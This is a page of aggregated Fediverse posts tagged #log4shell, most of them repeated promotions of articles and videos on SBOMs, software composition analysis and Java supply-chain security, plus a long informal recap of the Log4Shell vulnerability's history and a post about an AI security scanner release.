home.social

#log4shell — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #log4shell, aggregated by home.social.

  1. JAVAPRO @[email protected] ·

    Viele Java-Teams wissen nicht, welche Libraries wirklich produktiv laufen — bis die nächste #Log4Shell auftaucht. #SBOMs schaffen Transparenz über Abhängigkeiten & Risiken.

    Sven Ruppert zeigt die Praxis:
    javapro.io/de/sbom-fuer-java-e
    javapro.io/de/sbom-fuer-java-e

    #Maven #Gradle #CycloneDX

    #log4shell #sboms #maven #gradle #cyclonedx
  2. JAVAPRO @[email protected] ·

    Viele Java-Teams wissen nicht, welche Libraries wirklich produktiv laufen — bis die nächste #Log4Shell auftaucht. #SBOMs schaffen Transparenz über Abhängigkeiten & Risiken.

    Sven Ruppert zeigt die Praxis:
    javapro.io/de/sbom-fuer-java-e
    javapro.io/de/sbom-fuer-java-e

    #Maven #Gradle #CycloneDX

    #log4shell #sboms #maven #gradle #cyclonedx
  3. JAVAPRO @[email protected] ·

    Viele Java-Teams wissen nicht, welche Libraries wirklich produktiv laufen — bis die nächste #Log4Shell auftaucht. #SBOMs schaffen Transparenz über Abhängigkeiten & Risiken.

    Sven Ruppert zeigt die Praxis:
    javapro.io/de/sbom-fuer-java-e
    javapro.io/de/sbom-fuer-java-e

    #Maven #Gradle #CycloneDX

    #log4shell #sboms #maven #gradle #cyclonedx
  4. JAVAPRO @[email protected] ·

    Viele Java-Teams wissen nicht, welche Libraries wirklich produktiv laufen — bis die nächste #Log4Shell auftaucht. #SBOMs schaffen Transparenz über Abhängigkeiten & Risiken.

    Sven Ruppert zeigt die Praxis:
    javapro.io/de/sbom-fuer-java-e
    javapro.io/de/sbom-fuer-java-e

    #Maven #Gradle #CycloneDX

    #cyclonedx #gradle #maven #sboms #log4shell
  5. JAVAPRO @[email protected] ·

    Viele Java-Teams wissen nicht, welche Libraries wirklich produktiv laufen — bis die nächste #Log4Shell auftaucht. #SBOMs schaffen Transparenz über Abhängigkeiten & Risiken.

    Sven Ruppert zeigt die Praxis:
    javapro.io/de/sbom-fuer-java-e
    javapro.io/de/sbom-fuer-java-e

    #Maven #Gradle #CycloneDX

    #log4shell #sboms #maven #gradle #cyclonedx
  6. Tecnoblog • tecnologia que interessa [Unofficial] @[email protected] ·

    O que é ataque zero-day? Conheça uma das principais ameaças de cibersegurança

    fed.brid.gy/r/https://tecnoblo

    #segurancaeprivacidade #log4shell #windows
  7. Carolina Code Conference @[email protected] ·

    ICYMI: Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

    #shorts #log4shell #softwareanalysis #cybersecurity #vulnerability
  8. Carolina Code Conference @[email protected] ·

    ICYMI: Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

    #shorts #log4shell #softwareanalysis #cybersecurity #vulnerability
  9. Carolina Code Conference @[email protected] ·

    ICYMI: Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

    #shorts #log4shell #softwareanalysis #cybersecurity #vulnerability
  10. Carolina Code Conference @[email protected] ·

    ICYMI: Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

    #vulnerability #cybersecurity #softwareanalysis #log4shell #shorts
  11. Carolina Code Conference @[email protected] ·

    ICYMI: Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

    #shorts #log4shell #softwareanalysis #cybersecurity #vulnerability
  12. JAVAPRO @[email protected] ·

    You trust your dependencies? That’s the risk. From #Log4Shell to self-replicating worms, attacks don’t hit your code first — they hit your supply chain, often via packages.

    @MohammadAliEN explains what to watch: javapro.io/2026/04/23/the-whis

    #AppSec #Java #SupplyChainSecurity

    #log4shell #appsec #java #supplychainsecurity
  13. JAVAPRO @[email protected] ·

    You trust your dependencies? That’s the risk. From #Log4Shell to self-replicating worms, attacks don’t hit your code first — they hit your supply chain, often via packages.

    @MohammadAliEN explains what to watch: javapro.io/2026/04/23/the-whis

    #AppSec #Java #SupplyChainSecurity

    #log4shell #appsec #java #supplychainsecurity
  14. JAVAPRO @[email protected] ·

    If your #Java stack relies on “upstream will fix it”, you already lost time. @spoole167 shows how real-world Java systems survive on unmaintained code — and what to do instead.

    Learn from the #SupplyChain reality: javapro.io/2026/01/08/the-myth

    #CyberSecurity #AI #Log4Shell

    #java #supplychain #cybersecurity #ai #log4shell
  15. JAVAPRO @[email protected] ·

    If your #Java stack relies on “upstream will fix it”, you already lost time. @spoole167 shows how real-world Java systems survive on unmaintained code — and what to do instead.

    Learn from the #SupplyChain reality: javapro.io/2026/01/08/the-myth

    #CyberSecurity #AI #Log4Shell

    #java #supplychain #cybersecurity #ai #log4shell
  16. JAVAPRO @[email protected] ·

    If your #Java stack relies on “upstream will fix it”, you already lost time. @spoole167 shows how real-world Java systems survive on unmaintained code — and what to do instead.

    Learn from the #SupplyChain reality: javapro.io/2026/01/08/the-myth

    #CyberSecurity #AI #Log4Shell

    #java #supplychain #cybersecurity #ai #log4shell
  17. JAVAPRO @[email protected] ·

    If your #Java stack relies on “upstream will fix it”, you already lost time. @spoole167 shows how real-world Java systems survive on unmaintained code — and what to do instead.

    Learn from the #SupplyChain reality: javapro.io/2026/01/08/the-myth

    #CyberSecurity #AI #Log4Shell

    #log4shell #ai #cybersecurity #supplychain #java
  18. JAVAPRO @[email protected] ·

    If your #Java stack relies on “upstream will fix it”, you already lost time. @spoole167 shows how real-world Java systems survive on unmaintained code — and what to do instead.

    Learn from the #SupplyChain reality: javapro.io/2026/01/08/the-myth

    #CyberSecurity #AI #Log4Shell

    #java #supplychain #cybersecurity #ai #log4shell
  19. Carolina Code Conference @[email protected] ·

    Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

    #shorts #log4shell #softwareanalysis #cybersecurity #vulnerability
  20. Carolina Code Conference @[email protected] ·

    Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

    #shorts #log4shell #softwareanalysis #cybersecurity #vulnerability
  21. Carolina Code Conference @[email protected] ·

    Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

    #shorts #log4shell #softwareanalysis #cybersecurity #vulnerability
  22. Carolina Code Conference @[email protected] ·

    Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

    #vulnerability #cybersecurity #softwareanalysis #log4shell #shorts
  23. Carolina Code Conference @[email protected] ·

    Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

    #shorts #log4shell #softwareanalysis #cybersecurity #vulnerability
  24. hasamba @[email protected] ·

    ----------------

    🤖 Tool: MEDUSA — AI-first Security Scanner

    Overview

    MEDUSA is presented as an AI-first security scanner with more than 9,600 detection patterns focused on AI/ML applications, LLM agents, RAG pipelines, MCP servers and traditional codebases. The release v2026.5.0 emphasizes AI supply-chain coverage with a new Git scanning capability and repo poisoning detection.

    Key technical facts
    • Detection surface: 9,600+ AI security patterns targeting agent frameworks, MCP protocols, RAG components and editor/IDE config files.
    • CVE coverage: Product claims detection of 133 CVEs, with named detections including Log4Shell, Spring4Shell, XZ Utils backdoor, LangChain RCE, MCP remote code execution and React2Shell.
    • New rules: v2026.5.0 adds 45 attack rules for repo poisoning and 11 rules for MCP advanced attacks (schema poisoning, sampling injection, cross-server manipulation, Flowise RCE).
    • Repo poisoning specifics: Detection across 28+ AI editor and IDE file types (examples enumerated include Cursor, Cline, Copilot, Claude Code, Gemini CLI, Kiro, Codex CLI, Windsurf, Amazon Q, Roo Code).
    • Performance & outputs: Parallel processing for multi-core scanning, smart caching to skip unchanged files, and multiple export formats (JSON, HTML, Markdown, SARIF).

    Technical implications (reporting the release)

    The release documents a focused effort on AI supply-chain tactics: repo poisoning heuristics, editor-config weaponization, and MCP-targeted attack rules. The product adds path-relative FP filtering to reduce false positives when repo names previously matched heuristics. The Git scanning feature is described as a single-step repo analysis for supply-chain indicators.

    Constraints and scope

    The documentation frames MEDUSA as cross-platform (Windows/macOS/Linux) with IDE integrations and optional linter enhancements. The release notes list capabilities and detection counts; they do not provide operational deployment commands or step‑by‑step setup details.

    🔹 medusa #ai_security #repo_poisoning #log4shell #langchain

    🔗 Source: github.com/Pantheon-Security/m

    #langchain #log4shell #repo_poisoning #ai_security
  25. Carolina Code Conference @[email protected] ·

    FYI: Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

    #shorts #log4shell #softwareanalysis #cybersecurity #vulnerability
  26. Carolina Code Conference @[email protected] ·

    FYI: Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

    #shorts #log4shell #softwareanalysis #cybersecurity #vulnerability
  27. Carolina Code Conference @[email protected] ·

    FYI: Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

    #shorts #log4shell #softwareanalysis #cybersecurity #vulnerability
  28. Carolina Code Conference @[email protected] ·

    FYI: Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

    #vulnerability #cybersecurity #softwareanalysis #log4shell #shorts
  29. Carolina Code Conference @[email protected] ·

    FYI: Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

    #shorts #log4shell #softwareanalysis #cybersecurity #vulnerability
  30. Radio_Azureus @[email protected] ·

    Log4Shell

    TIL about the breakdown of the Log4Shell shared library.

    • Date of occurence
    • 24 November 2K21
    • location of programmer at home with his son logging into minecraft (which failed)
    • this vulnerability had existed unnoticed since 2013
    • it was privately disclosed to the Apache Software Foundation { Log4j is a project}
    • discloser: Chen Zhaojun of Alibaba Cloud's infosec team
    • date 24 November 2021
    • exploit severety MAXIMUM
    • It's simple to execute
    • estimation of affect ration of 50% of the internet (many hundreds of millions of devices)
    • vulnerability abuses Log4j allowing requests to arbitrary LDAP and JNDI servers
    • that allows attackers to
    • execute arbitrary Java code on server / client
    • leak sensitive data

    Innerworkings

    • Log4j
    • open-source logging framework
    • enables programmers to log data within their applications
    • can include user input
    • is used ubiquitously in Java programs especially enterprise software
    • Originally written in 2001 by Ceki Gülcü
    • part of Apache Logging Services
    • project of the Apache Software Foundation

    Tom Kellermann, a member of President Obama's Commission on Cyber Security

    • Apache is "one of the giant supports of a bridge which facilitates the connective tissue between the worlds of applications and computer environments

    Affected commercial services

    • Amazon Web Services {AWS}
    • Cloudflare
    • iCloud {Apple infrastructure}
    • Minecraft: {Java}
    • Steam {multi platform gaming}
    • Tencent QQ### Wiz and EY sate that the vulnerability affected 93% of enterprise cloud environments

    The Log4Shell vulnerability's disclosure received strong reactions from cybersecurity experts.

    Cybersecurity company Tenable stated

    • exploit is "the single biggest, most critical vulnerability ever## Ars Technica
    • arguably the most severe vulnerability ever

    Quote
    Log4j is foundational software. This 20+ year-old Java logging library quietly powers system events in applications worldwide, like user logins and calculation results. But this small piece of software had quietly become a dependency in thousands of projects across the Java ecosystem.

    Opinion & reaction

    • I'm blown away by the events leading to the tornadoes & typhoons that followed shortly after in the OpenSource programming World
    • Fifty percent of software was affected with 93% of enterprise software sub section
    • Log4Shell is a critical infrastructure level shared library
    • nearly everyone using java depends on it's functional I/O

    Analysis

    • why do most Open Source software users only contact programmers when bugs are detected?
    • why do they (almost) never get compliments when it goes well?
    • programmers burn out after a while and leave projects abandoned
    • when you were a kid, your mom / dad / family complimented you on good results
    • programmers need the same
    • otherwise they will leave the projects

    Open Source programming is a thankless job

    • Zero cash influx
    • no thank you's
    • complaints even when software has long matured to stable levels
    • entitled users
    • threats to be Doxxed or worse

    Be nice to Open Source programmers

    • If you have following contact here on the Fediverse with one say thank you
    • don't expect replies (esp when hundreds to thousands of followers are indicated)
    • realize you either can't code programs of that caliber or don't want to invest the time
    • I am lucky to have conversational contact ont the FediVerse with critical infrastructure programmers
    • I always say thank you, because I know how hard it is to write software of that magnitude
    • when I review their software, I am critical, but formulate my words and sentences in a manner I would want to read them if places were switched
    • I am thankful first, thus send them Universal Love and Universal Energy
    • My toot history stand for these statements (on my other Fediverse accounts)

    Don't be a dick!

    Be nice to programmers

    Give them Love

    Z

    #Log4Shell #TIL #programming #data #Java #exploit #ZeroDay #technology #Enterprise #networking #OpenSource #POSIX #BSD #freeBSD #ghostBSD #openBSD #Linux #win64 #mac #history #reading

    Sources:

    github.blog/open-source/inside

    en.wikipedia.org/wiki/Log4Shell

    #log4shell #til #programming #data #java #exploit
  31. Radio_Azureus @[email protected] ·

    Log4Shell

    TIL about the breakdown of the Log4Shell shared library.

    • Date of occurence
    • 24 November 2K21
    • location of programmer at home with his son logging into minecraft (which failed)
    • this vulnerability had existed unnoticed since 2013
    • it was privately disclosed to the Apache Software Foundation { Log4j is a project}
    • discloser: Chen Zhaojun of Alibaba Cloud's infosec team
    • date 24 November 2021
    • exploit severety MAXIMUM
    • It's simple to execute
    • estimation of affect ration of 50% of the internet (many hundreds of millions of devices)
    • vulnerability abuses Log4j allowing requests to arbitrary LDAP and JNDI servers
    • that allows attackers to
    • execute arbitrary Java code on server / client
    • leak sensitive data

    Innerworkings

    • Log4j
    • open-source logging framework
    • enables programmers to log data within their applications
    • can include user input
    • is used ubiquitously in Java programs especially enterprise software
    • Originally written in 2001 by Ceki Gülcü
    • part of Apache Logging Services
    • project of the Apache Software Foundation

    Tom Kellermann, a member of President Obama's Commission on Cyber Security

    • Apache is "one of the giant supports of a bridge which facilitates the connective tissue between the worlds of applications and computer environments

    Affected commercial services

    • Amazon Web Services {AWS}
    • Cloudflare
    • iCloud {Apple infrastructure}
    • Minecraft: {Java}
    • Steam {multi platform gaming}
    • Tencent QQ### Wiz and EY sate that the vulnerability affected 93% of enterprise cloud environments

    The Log4Shell vulnerability's disclosure received strong reactions from cybersecurity experts.

    Cybersecurity company Tenable stated

    • exploit is "the single biggest, most critical vulnerability ever## Ars Technica
    • arguably the most severe vulnerability ever

    Quote
    Log4j is foundational software. This 20+ year-old Java logging library quietly powers system events in applications worldwide, like user logins and calculation results. But this small piece of software had quietly become a dependency in thousands of projects across the Java ecosystem.

    Opinion & reaction

    • I'm blown away by the events leading to the tornadoes & typhoons that followed shortly after in the OpenSource programming World
    • Fifty percent of software was affected with 93% of enterprise software sub section
    • Log4Shell is a critical infrastructure level shared library
    • nearly everyone using java depends on it's functional I/O

    Analysis

    • why do most Open Source software users only contact programmers when bugs are detected?
    • why do they (almost) never get compliments when it goes well?
    • programmers burn out after a while and leave projects abandoned
    • when you were a kid, your mom / dad / family complimented you on good results
    • programmers need the same
    • otherwise they will leave the projects

    Open Source programming is a thankless job

    • Zero cash influx
    • no thank you's
    • complaints even when software has long matured to stable levels
    • entitled users
    • threats to be Doxxed or worse

    Be nice to Open Source programmers

    • If you have following contact here on the Fediverse with one say thank you
    • don't expect replies (esp when hundreds to thousands of followers are indicated)
    • realize you either can't code programs of that caliber or don't want to invest the time
    • I am lucky to have conversational contact ont the FediVerse with critical infrastructure programmers
    • I always say thank you, because I know how hard it is to write software of that magnitude
    • when I review their software, I am critical, but formulate my words and sentences in a manner I would want to read them if places were switched
    • I am thankful first, thus send them Universal Love and Universal Energy
    • My toot history stand for these statements (on my other Fediverse accounts)

    Don't be a dick!

    Be nice to programmers

    Give them Love

    Z

    #Log4Shell #TIL #programming #data #Java #exploit #ZeroDay #technology #Enterprise #networking #OpenSource #POSIX #BSD #freeBSD #ghostBSD #openBSD #Linux #win64 #mac #history #reading

    Sources:

    github.blog/open-source/inside

    en.wikipedia.org/wiki/Log4Shell

    #log4shell #til #programming #data #java #exploit
  32. Radio_Azureus @[email protected] ·

    Log4Shell

    TIL about the breakdown of the Log4Shell shared library.

    • Date of occurence
    • 24 November 2K21
    • location of programmer at home with his son logging into minecraft (which failed)
    • this vulnerability had existed unnoticed since 2013
    • it was privately disclosed to the Apache Software Foundation { Log4j is a project}
    • discloser: Chen Zhaojun of Alibaba Cloud's infosec team
    • date 24 November 2021
    • exploit severety MAXIMUM
    • It's simple to execute
    • estimation of affect ration of 50% of the internet (many hundreds of millions of devices)
    • vulnerability abuses Log4j allowing requests to arbitrary LDAP and JNDI servers
    • that allows attackers to
    • execute arbitrary Java code on server / client
    • leak sensitive data

    Innerworkings

    • Log4j
    • open-source logging framework
    • enables programmers to log data within their applications
    • can include user input
    • is used ubiquitously in Java programs especially enterprise software
    • Originally written in 2001 by Ceki Gülcü
    • part of Apache Logging Services
    • project of the Apache Software Foundation

    Tom Kellermann, a member of President Obama's Commission on Cyber Security

    • Apache is "one of the giant supports of a bridge which facilitates the connective tissue between the worlds of applications and computer environments

    Affected commercial services

    • Amazon Web Services {AWS}
    • Cloudflare
    • iCloud {Apple infrastructure}
    • Minecraft: {Java}
    • Steam {multi platform gaming}
    • Tencent QQ### Wiz and EY sate that the vulnerability affected 93% of enterprise cloud environments

    The Log4Shell vulnerability's disclosure received strong reactions from cybersecurity experts.

    Cybersecurity company Tenable stated

    • exploit is "the single biggest, most critical vulnerability ever## Ars Technica
    • arguably the most severe vulnerability ever

    Quote
    Log4j is foundational software. This 20+ year-old Java logging library quietly powers system events in applications worldwide, like user logins and calculation results. But this small piece of software had quietly become a dependency in thousands of projects across the Java ecosystem.

    Opinion & reaction

    • I'm blown away by the events leading to the tornadoes & typhoons that followed shortly after in the OpenSource programming World
    • Fifty percent of software was affected with 93% of enterprise software sub section
    • Log4Shell is a critical infrastructure level shared library
    • nearly everyone using java depends on it's functional I/O

    Analysis

    • why do most Open Source software users only contact programmers when bugs are detected?
    • why do they (almost) never get compliments when it goes well?
    • programmers burn out after a while and leave projects abandoned
    • when you were a kid, your mom / dad / family complimented you on good results
    • programmers need the same
    • otherwise they will leave the projects

    Open Source programming is a thankless job

    • Zero cash influx
    • no thank you's
    • complaints even when software has long matured to stable levels
    • entitled users
    • threats to be Doxxed or worse

    Be nice to Open Source programmers

    • If you have following contact here on the Fediverse with one say thank you
    • don't expect replies (esp when hundreds to thousands of followers are indicated)
    • realize you either can't code programs of that caliber or don't want to invest the time
    • I am lucky to have conversational contact ont the FediVerse with critical infrastructure programmers
    • I always say thank you, because I know how hard it is to write software of that magnitude
    • when I review their software, I am critical, but formulate my words and sentences in a manner I would want to read them if places were switched
    • I am thankful first, thus send them Universal Love and Universal Energy
    • My toot history stand for these statements (on my other Fediverse accounts)

    Don't be a dick!

    Be nice to programmers

    Give them Love

    Z

    #Log4Shell #TIL #programming #data #Java #exploit #ZeroDay #technology #Enterprise #networking #OpenSource #POSIX #BSD #freeBSD #ghostBSD #openBSD #Linux #win64 #mac #history #reading

    Sources:

    github.blog/open-source/inside

    en.wikipedia.org/wiki/Log4Shell

    #history #reading #log4shell #til #programming #data
  33. Radio_Azureus @[email protected] ·

    Log4Shell

    TIL about the breakdown of the Log4Shell shared library.

    • Date of occurence
    • 24 November 2K21
    • location of programmer at home with his son logging into minecraft (which failed)
    • this vulnerability had existed unnoticed since 2013
    • it was privately disclosed to the Apache Software Foundation { Log4j is a project}
    • discloser: Chen Zhaojun of Alibaba Cloud's infosec team
    • date 24 November 2021
    • exploit severety MAXIMUM
    • It's simple to execute
    • estimation of affect ration of 50% of the internet (many hundreds of millions of devices)
    • vulnerability abuses Log4j allowing requests to arbitrary LDAP and JNDI servers
    • that allows attackers to
    • execute arbitrary Java code on server / client
    • leak sensitive data

    Innerworkings

    • Log4j
    • open-source logging framework
    • enables programmers to log data within their applications
    • can include user input
    • is used ubiquitously in Java programs especially enterprise software
    • Originally written in 2001 by Ceki Gülcü
    • part of Apache Logging Services
    • project of the Apache Software Foundation

    Tom Kellermann, a member of President Obama's Commission on Cyber Security

    • Apache is "one of the giant supports of a bridge which facilitates the connective tissue between the worlds of applications and computer environments

    Affected commercial services

    • Amazon Web Services {AWS}
    • Cloudflare
    • iCloud {Apple infrastructure}
    • Minecraft: {Java}
    • Steam {multi platform gaming}
    • Tencent QQ### Wiz and EY sate that the vulnerability affected 93% of enterprise cloud environments

    The Log4Shell vulnerability's disclosure received strong reactions from cybersecurity experts.

    Cybersecurity company Tenable stated

    • exploit is "the single biggest, most critical vulnerability ever## Ars Technica
    • arguably the most severe vulnerability ever

    Quote
    Log4j is foundational software. This 20+ year-old Java logging library quietly powers system events in applications worldwide, like user logins and calculation results. But this small piece of software had quietly become a dependency in thousands of projects across the Java ecosystem.

    Opinion & reaction

    • I'm blown away by the events leading to the tornadoes & typhoons that followed shortly after in the OpenSource programming World
    • Fifty percent of software was affected with 93% of enterprise software sub section
    • Log4Shell is a critical infrastructure level shared library
    • nearly everyone using java depends on it's functional I/O

    Analysis

    • why do most Open Source software users only contact programmers when bugs are detected?
    • why do they (almost) never get compliments when it goes well?
    • programmers burn out after a while and leave projects abandoned
    • when you were a kid, your mom / dad / family complimented you on good results
    • programmers need the same
    • otherwise they will leave the projects

    Open Source programming is a thankless job

    • Zero cash influx
    • no thank you's
    • complaints even when software has long matured to stable levels
    • entitled users
    • threats to be Doxxed or worse

    Be nice to Open Source programmers

    • If you have following contact here on the Fediverse with one say thank you
    • don't expect replies (esp when hundreds to thousands of followers are indicated)
    • realize you either can't code programs of that caliber or don't want to invest the time
    • I am lucky to have conversational contact ont the FediVerse with critical infrastructure programmers
    • I always say thank you, because I know how hard it is to write software of that magnitude
    • when I review their software, I am critical, but formulate my words and sentences in a manner I would want to read them if places were switched
    • I am thankful first, thus send them Universal Love and Universal Energy
    • My toot history stand for these statements (on my other Fediverse accounts)

    Don't be a dick!

    Be nice to programmers

    Give them Love

    Z

    #Log4Shell #TIL #programming #data #Java #exploit #ZeroDay #technology #Enterprise #networking #OpenSource #POSIX #BSD #freeBSD #ghostBSD #openBSD #Linux #win64 #mac #history #reading

    Sources:

    github.blog/open-source/inside

    en.wikipedia.org/wiki/Log4Shell

    #reading #history #mac #win64 #linux #openbsd
  34. Radio_Azureus @[email protected] ·

    Log4Shell

    TIL about the breakdown of the Log4Shell shared library.

    • Date of occurence
    • 24 November 2K21
    • location of programmer at home with his son logging into minecraft (which failed)
    • this vulnerability had existed unnoticed since 2013
    • it was privately disclosed to the Apache Software Foundation { Log4j is a project}
    • discloser: Chen Zhaojun of Alibaba Cloud's infosec team
    • date 24 November 2021
    • exploit severety MAXIMUM
    • It's simple to execute
    • estimation of affect ration of 50% of the internet (many hundreds of millions of devices)
    • vulnerability abuses Log4j allowing requests to arbitrary LDAP and JNDI servers
    • that allows attackers to
    • execute arbitrary Java code on server / client
    • leak sensitive data

    Innerworkings

    • Log4j
    • open-source logging framework
    • enables programmers to log data within their applications
    • can include user input
    • is used ubiquitously in Java programs especially enterprise software
    • Originally written in 2001 by Ceki Gülcü
    • part of Apache Logging Services
    • project of the Apache Software Foundation

    Tom Kellermann, a member of President Obama's Commission on Cyber Security

    • Apache is "one of the giant supports of a bridge which facilitates the connective tissue between the worlds of applications and computer environments

    Affected commercial services

    • Amazon Web Services {AWS}
    • Cloudflare
    • iCloud {Apple infrastructure}
    • Minecraft: {Java}
    • Steam {multi platform gaming}
    • Tencent QQ### Wiz and EY sate that the vulnerability affected 93% of enterprise cloud environments

    The Log4Shell vulnerability's disclosure received strong reactions from cybersecurity experts.

    Cybersecurity company Tenable stated

    • exploit is "the single biggest, most critical vulnerability ever## Ars Technica
    • arguably the most severe vulnerability ever

    Quote
    Log4j is foundational software. This 20+ year-old Java logging library quietly powers system events in applications worldwide, like user logins and calculation results. But this small piece of software had quietly become a dependency in thousands of projects across the Java ecosystem.

    Opinion & reaction

    • I'm blown away by the events leading to the tornadoes & typhoons that followed shortly after in the OpenSource programming World
    • Fifty percent of software was affected with 93% of enterprise software sub section
    • Log4Shell is a critical infrastructure level shared library
    • nearly everyone using java depends on it's functional I/O

    Analysis

    • why do most Open Source software users only contact programmers when bugs are detected?
    • why do they (almost) never get compliments when it goes well?
    • programmers burn out after a while and leave projects abandoned
    • when you were a kid, your mom / dad / family complimented you on good results
    • programmers need the same
    • otherwise they will leave the projects

    Open Source programming is a thankless job

    • Zero cash influx
    • no thank you's
    • complaints even when software has long matured to stable levels
    • entitled users
    • threats to be Doxxed or worse

    Be nice to Open Source programmers

    • If you have following contact here on the Fediverse with one say thank you
    • don't expect replies (esp when hundreds to thousands of followers are indicated)
    • realize you either can't code programs of that caliber or don't want to invest the time
    • I am lucky to have conversational contact ont the FediVerse with critical infrastructure programmers
    • I always say thank you, because I know how hard it is to write software of that magnitude
    • when I review their software, I am critical, but formulate my words and sentences in a manner I would want to read them if places were switched
    • I am thankful first, thus send them Universal Love and Universal Energy
    • My toot history stand for these statements (on my other Fediverse accounts)

    Don't be a dick!

    Be nice to programmers

    Give them Love

    Z

    #Log4Shell #TIL #programming #data #Java #exploit #ZeroDay #technology #Enterprise #networking #OpenSource #POSIX #BSD #freeBSD #ghostBSD #openBSD #Linux #win64 #mac #history #reading

    Sources:

    github.blog/open-source/inside

    en.wikipedia.org/wiki/Log4Shell

    #log4shell #til #programming #data #java #exploit
  35. JAVAPRO @[email protected] ·

    #Log4Shell didn’t break #Java — it revealed it. @spoole167 shows how decades of “it still works” thinking left the Java #SupplyChain exposed & why maintenance is now a legal obligation.

    See what regulators expect from Java teams: javapro.io/2026/01/08/the-myth

    #CyberSecurity #AI

    #log4shell #java #supplychain #cybersecurity #ai
  36. JAVAPRO @[email protected] ·

    #Log4Shell didn’t break #Java — it revealed it. @spoole167 shows how decades of “it still works” thinking left the Java #SupplyChain exposed & why maintenance is now a legal obligation.

    See what regulators expect from Java teams: javapro.io/2026/01/08/the-myth

    #CyberSecurity #AI

    #ai #cybersecurity #supplychain #java #log4shell
  37. JAVAPRO @[email protected] ·

    #Log4Shell didn’t break #Java — it revealed it. @spoole167 shows how decades of “it still works” thinking left the Java #SupplyChain exposed & why maintenance is now a legal obligation.

    See what regulators expect from Java teams: javapro.io/2026/01/08/the-myth

    #CyberSecurity #AI

    #log4shell #java #supplychain #cybersecurity #ai
  38. CVEDatabase.com @[email protected] ·

    🔍 CVE-2021-44228 (Log4Shell)
    Three years later, Log4Shell is still being scanned for on the internet every single day.
    Why?
    Legacy Java apps
    Forgotten containers
    Vendors who never backported fixes

    👉 Breakdown & mitigation:
    cvedatabase.com/cve/CVE-2021-4
    #CVE #Log4Shell #CyberSecurity

    #cybersecurity #log4shell #cve
  39. CVEDatabase.com @cvedatabase ·

    🔍 CVE-2021-44228 (Log4Shell)
    Three years later, Log4Shell is still being scanned for on the internet every single day.
    Why?
    Legacy Java apps
    Forgotten containers
    Vendors who never backported fixes

    👉 Breakdown & mitigation:
    cvedatabase.com/cve/CVE-2021-4

    #cve #log4shell #cybersecurity
  40. Carolina Code Conference @[email protected] ·

    ICYMI: Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

    #shorts #log4shell #softwareanalysis #cybersecurity #vulnerability
  41. Carolina Code Conference @[email protected] ·

    ICYMI: Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

